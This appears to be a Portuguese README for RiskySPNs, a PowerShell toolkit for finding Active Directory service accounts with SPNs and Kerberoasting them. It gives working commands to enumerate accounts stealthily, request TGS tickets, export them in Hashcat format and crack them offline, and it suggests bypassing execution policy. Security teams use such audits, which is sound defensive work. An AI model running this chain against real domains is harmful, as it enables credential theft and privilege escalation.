
Detectar e explorar SPNs arriscados
RiskySPNs é uma coleção de scripts PowerShell focados em detectar e explorar contas associadas a SPNs (Service Principal Name). Este módulo pode auxiliar equipes azuis a identificar SPNs potencialmente arriscados, bem como equipes vermelhas a escalar privilégios utilizando Kerberos e Active Directory.
Para informações detalhadas: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/
Import-Module .\RiskySPNs.psm1
Ou apenas carregue o script (você também pode usar IEX a partir da web)
. .\Find-PotentiallyCrackableAccounts.ps1
Certifique-se de que Set-ExecutionPolicy esteja como Unrestricted ou Bypass
Get-Help Get-TGSCipher -Full
Todas as funções também possuem o modo -Verbose
Encontrar contas vulneráveis
Find-PotentiallyCrackableAccounts
Sensitive + RC4 = $$$
Gerar relatório completo e detalhado sobre contas vulneráveis (CISO <3)
Export-PotentiallyCrackableAccounts
Solicitar TGS Kerberos para SPN
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
Ou
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3